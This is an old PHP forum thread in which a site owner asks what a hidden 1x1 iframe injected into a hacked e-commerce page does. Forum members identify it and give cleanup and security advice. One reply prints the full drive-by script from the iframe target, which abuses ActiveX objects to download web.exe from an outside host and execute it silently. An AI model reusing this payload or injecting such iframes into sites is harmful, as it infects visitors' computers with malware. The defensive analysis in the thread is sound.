Author Topic: Hacked Site : What does this code do ?  (Read 2767 times)

0 Members and 1 Guest are viewing this topic.

Offline malcseniorTopic starter

  • Irregular
    • View Profile
Hacked Site : What does this code do ?
« on: July 02, 2006, 02:51:18 PM »
My daughters website, eCommerce based, has been hacked and the following line was inserted in her home (html) page and index (php) page:

<iframe src='http://ns192168-ip255.net/traffic/index.php' width=1
height=1></iframe>

What does it do and who did it ?

Pages are now read only any other security advice would be appreciated.

Offline Drumminxx

  • Enthusiast
    • View Profile
Re: Hacked Site : What does this code do ?
« Reply #1 on: July 02, 2006, 02:56:07 PM »
its an inline frame very common among people who want to insert another web page into your page.

you can just delete what you have posted

as far as security goes and assuming that your site is written in php you can use strip_tags() which will remove all the html from a string that was submitted.

but if it was not submitted through a post action and the site was actually hacked into, then you just may want to change your password to get access to the site
« Last Edit: July 02, 2006, 02:59:16 PM by Drumminxx »
:: gucci.com ::
:: blockbuster.com ::

--------------------

Offline Yojance

  • Irregular
    • View Profile
Re: Hacked Site : What does this code do ?
« Reply #2 on: July 02, 2006, 02:57:19 PM »
An Iframe is like inserting a page into another one. It basicly adds a a scrollable page inside another page.
In this case, from what I can see, it has a 1 by 1 pixel size so it should display something small, but I can also see that from my understanding is safe to remove the line.
Hope this help, and wait for advise from the experts :)

Offline malcseniorTopic starter

  • Irregular
    • View Profile
Re: Hacked Site : What does this code do ?
« Reply #3 on: July 02, 2006, 02:59:38 PM »
Thanks so far, I understand the iframe tag, but what does the links to ns192168-ip255.net/traffic/index.php do, is it feeding information to another server ?

Offline corbin

  • Guru
  • Freak!
  • *
  • Gender: Male
    • View Profile
Re: Hacked Site : What does this code do ?
« Reply #4 on: July 02, 2006, 03:00:17 PM »
Code: [Select]
var obj_RDS = document.createElement('object');
obj_RDS.setAttribute('id','obj_RDS');
obj_RDS.setAttribute('classid','clsid:BD96C556-65A3-11D0-983A-00C04FC29E36');
var obj_msxml2 = obj_RDS.CreateObject("msxml2.XMLHTTP","");
obj_msxml2.open("GET","http://ns192168-ip255.net/traffic/web.exe",false);
obj_msxml2.send();
var obj_ShellApp = obj_RDS.CreateObject("Shell.Application","");
var obj_adodb = obj_RDS.CreateObject("adodb.stream","");
obj_adodb.type = 1;
obj_adodb.open();
obj_adodb.Write(obj_msxml2.responseBody);
var fn = "C:\\246172160121.exe";
obj_adodb.SaveToFile(fn,2);
obj_ShellApp.ShellExecute(fn);

was in the page that was inserted... So from what i gather it was downloading http://ns192168-ip255.net/traffic/web.exe to what ever computer viewed that page and saving it as to the local computer as C:\246...exe
Why doesn't anyone ever say hi, hey, or whad up world?

Offline corbin

  • Guru
  • Freak!
  • *
  • Gender: Male
    • View Profile
Re: Hacked Site : What does this code do ?
« Reply #5 on: July 02, 2006, 03:02:38 PM »
Whoa, I just rewent to that site intending to analyze what it does farther, and the source code of it has been changed  :'(.  Now that page just does nothing... It calls an Iframe to a non existing site... You should still remove the iframe code from your daughters page though, and check on your computer for a wierd file on the top of the C drive named <random numbers>.exe
Why doesn't anyone ever say hi, hey, or whad up world?

Offline Drumminxx

  • Enthusiast
    • View Profile
Re: Hacked Site : What does this code do ?
« Reply #6 on: July 02, 2006, 03:48:17 PM »
yea now it has this

http://aaaafffffdddd.net

which is obviously not a real site
:: gucci.com ::
:: blockbuster.com ::

--------------------

Offline corbin

  • Guru
  • Freak!
  • *
  • Gender: Male
    • View Profile
Re: Hacked Site : What does this code do ?
« Reply #7 on: July 02, 2006, 03:55:44 PM »
Its odd how the page was changed about 3 seconds after i looked at it....
Why doesn't anyone ever say hi, hey, or whad up world?

Offline redarrow

  • Freak!
  • Gender: Male
  • PHP IS FOR LIFE!
    • View Profile
    • my free dating site (a blind php programmer!)
Re: Hacked Site : What does this code do ?
« Reply #8 on: July 02, 2006, 04:07:40 PM »
theres a .exe application running that code check the .exe name and exstention in the windows search see what you get.
Wish i new all about php DAM i will have to learn
((EMAIL CODE THAT WORKS))
http://simpleforum.ath.cx/mail2.inc
((PAYPAL INTEGRATION THAT WORKS))
http://simpleforum.ath.cx/paypal_info/paypal1_info.inc

Offline shoz

  • Staff Alumni
  • Devotee
  • *
    • View Profile
Re: Hacked Site : What does this code do ?
« Reply #9 on: July 02, 2006, 04:54:50 PM »
Quote from: malcsenior
Pages are now read only any other security advice would be appreciated.

Securing your site is something that requires more than using a few tips here and there. I'll give a few however.

I am not a security expert, but If the site's scripts are self written then you can start by read this Security Guide.

If this is a third party script, then you'll want to keep up on updates. You'll also want to search regularly to see if there are any known vulnerabilities for the script at a site such as http://www.securityfocus.com.

Having already been compromised, you may want to do the following things

1) Take the site down

2) Find out how the site was originally compromised. If you don't know then it's likely that it will happen again.

3) Depending on the level of access gained, you may want to change passwords for the databases,ftp,control panel etc. The associated email addresses should also possibly have their paswords changed if they are the same as any of the others.

You should be able to find sites that deal with (or have sections dealing with) overall security specifically, to get more opinions.

This doesn't have much to do with a PHP script you're writing so I've moved it to the Miscellaneous forum.
« Last Edit: July 02, 2006, 05:07:33 PM by shoz »

Offline malcseniorTopic starter

  • Irregular
    • View Profile
Re: Hacked Site : What does this code do ?
« Reply #10 on: July 03, 2006, 03:47:38 PM »
Thanks for putting this thread in the right place.
I am in the very early stages of php, you guys are mega cool and thanks for your advice so far.
Really appreciated.

The tricky line of code was removed, immediately it was spotted, all computers have been checked. both by virus, mallware tools and searching C; root. Macs have been used to check all tricky links as they are resistant to PC hacks. Will take all your advice onboard.
« Last Edit: July 03, 2006, 03:53:15 PM by malcsenior »

Offline Mr.x

  • Irregular
    • View Profile
Re: Hacked Site : What does this code do ?
« Reply #11 on: July 06, 2006, 12:48:06 AM »
That is the craziest thing i've seen all day!

Wonder what that program ran? If you havn't already make sure you can your computer and also try running some network security programs to check your computer for any newly opened ports? Make sure you have a firewall aswell.

Another security tip is to contact the hosting company. If you don't have access to the logs they do.

See if there was an unauthorized FTP login or if it was a vunlernability in eCommerce. You should also contact eCommerce because it is their responsibility to ensure their scripts are safe, especially when dealing with funds and sales.

PHP Freaks Forums

« on: »

Tired of these ads? Purchase a supporter subscription to get rid of them.